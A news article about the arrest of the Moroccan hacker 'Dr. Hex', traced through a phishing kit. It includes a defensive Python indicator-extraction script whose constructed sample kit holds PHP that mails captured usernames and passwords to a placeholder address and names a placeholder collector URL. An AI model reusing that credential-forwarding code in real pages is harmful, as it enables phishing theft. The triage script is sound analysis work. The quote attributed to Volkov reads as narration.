Interpol has received valuable information from Group-IB and managed to locate and arrest a Moroccan hacker using the nickname “Dr. Hex” (among others). The person is considered responsible for multiple cyber-attacks against French banks, French IT firms, and several high-profile organizations in the European country. The main trick used by the hacker was a phishing kit with which he created several phishing websites to steal valuable bank system user credentials.
Group-IB analyzed this kit and investigated the email address hardcoded in it. Using this lead, the researchers found a YouTube channel that contained links to an Arabic crowd-funding platform. This, in turn, led to a full name; DNS analysis then turned up another two domains registered under that name. Eventually, the circle was closed by discovering that the website had been built using the same phishing kit.
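The pivot described above starts with a hardcoded address in the kit's server-side glue code: phishing kits typically forward captured credentials by `mail()` or by POSTing to a remote collector, and those destinations are the first indicators an analyst pulls out. The following is an added example written for this page, not Group-IB's tooling; it scans a constructed, clearly fake kit (the `example.invalid` names are placeholders) for email addresses, outbound URLs, and files that call PHP's `mail()`, and can be pointed at a real extracted kit directory with the `load_kit_dir` helper (an assumption about layout: plain text files under one directory).

```python
import os
import re
from typing import Dict, List

# Constructed sample "kit": filenames mapped to file contents, imitating the
# PHP glue code a kit uses to forward stolen credentials. Not a real kit.
SAMPLE_KIT: Dict[str, str] = {
    "index.html": "<html><form action='login.php' method='post'></form></html>",
    "login.php": (
        "<?php\n"
        "$to = 'results-collector@example.invalid';\n"
        "$msg = 'user='.$_POST['user'].'&pass='.$_POST['pass'];\n"
        "mail($to, 'New login', $msg);\n"
        "header('Location: https://bank.example.invalid/');\n"
    ),
    "config.php": (
        "<?php\n"
        "$backup = \"backup-box@example.invalid\";\n"
        "$hook = 'https://collector.example.invalid/drop.php';\n"
    ),
}

# Loose patterns: recall matters more than precision at the triage stage.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")


def extract_indicators(kit: Dict[str, str]) -> Dict[str, List[str]]:
    """Return hardcoded email addresses, URLs and the files that call mail()."""
    emails, urls, mail_files = set(), set(), []
    for name, content in kit.items():
        emails.update(EMAIL_RE.findall(content))
        urls.update(URL_RE.findall(content))
        if MAIL_CALL_RE.search(content):
            mail_files.append(name)
    return {
        "emails": sorted(emails),
        "urls": sorted(urls),
        "mail_call_files": sorted(mail_files),
    }


def load_kit_dir(root: str) -> Dict[str, str]:
    """Read every file under an extracted kit directory as text (binary junk ignored)."""
    kit: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                kit[os.path.relpath(path, root)] = fh.read()
    return kit


if __name__ == "__main__":
    for key, values in extract_indicators(SAMPLE_KIT).items():
        print(f"{key}:")
        for v in values:
            print(f"  {v}")
```

Each extracted address or host is a pivot point to check against registrar, DNS history and public profiles, exactly the chain the article describes; the `mail_call_files` list tells you which script to read first when reversing where the captured data goes.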
The researchers connected the hacker with five more email addresses, found infrastructure traces, linked him with specific campaigns, and also found more accounts on YouTube, Facebook, Instagram, and Skype, all belonging to him. Having a complete record of his digital footprint spanning from 2009 to 2018, Interpol was able to coordinate with the Moroccan police and arrested the suspect last month.
As Group-IB’s CTO, Dmitry Volkov, stated about this success:
“Dr. Hex” is now facing several charges relating to 130 website defacements, phishing, malware development, fraud, and carding activities that affected thousands of victims. He is likely to receive several years in prison as well as a hefty fine.
Back in March 2020, we covered a similar story about a careless Moroccan hacker targeting large French firms using an email address connected to his real identity, his physical business, and several social media accounts. Maybe OpSec mishandling is a thing among Moroccan hackers, as the two don’t appear to be linked in any way.